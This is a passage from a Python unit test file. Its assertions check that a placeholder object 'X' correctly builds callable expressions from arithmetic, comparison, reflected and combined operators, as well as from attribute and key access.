assert X.y(Row(x=2, y=3)) == 3
assert X['x'](dict(x=4, y=5)) == 4
assert (X + 3)(5) == 8
assert (X - 2)(6) == 4
assert (X * 3)(4) == 12
assert (X / 2)(9) == 4.5
assert (X // 2)(9) == 4
assert (X % 3)(5) == 2
assert (divmod(X, 3))(5) == (1, 2)
assert (X**2)(4) == 16
assert (X == 3)(3) == True
assert (3 == X)(4) == False
assert (X == 3)(4) == False
assert (3 == X)(3) == True
assert (X != 3)(4) == True
assert (3 != X)(3) == False
assert (X > 3)(4) == True
assert (X > 3)(2) == False
assert (3 > X)(4) == False
assert (3 > X)(2) == True
assert (X < 3)(4) == False
assert (X < 3)(2) == True
assert (X >= 3)(3) == True
assert (X >= 3)(2) == False
assert (X <= 3)(3) == True
assert (X <= 3)(2) == True
def test_reflected():
# assert X.y(Row(x=2, y=3)) == 3
# assert X['x'](dict(x=4, y=5)) == 4
assert (3 + X)(5) == 8
assert (2 - X)(6) == -4
assert (3 * X)(4) == 12
assert (9 / X)(2) == 4.5
assert (9 // X)(2) == 4
assert (5 % X)(3) == 2
assert (divmod(5, X))(3) == (1, 2)
assert (2**X)(3) == 8
def test_multiple_X():
assert (X.y + X.x)(Row(x=2, y=3)) == 5
assert (X['x'] + X['y'])(dict(x=2, y=3)) == 5
assert (X + X)(5) == 10
assert (X - X)(5) == 0
assert (X * X)(5) == 25
assert (X / X)(5) == 1
assert (X.y / X.x)(Row(x=2, y=3)) == 1.5
assert (X.y // X.x)(Row(x=2, y=3)) == 1
assert (X.y % X.x)(Row(x=3, y=5)) == 2
assert (divmod(X.y, X.x))(Row(x=3, y=5)) == (1, 2)
assert (X**X)(3) == 27
|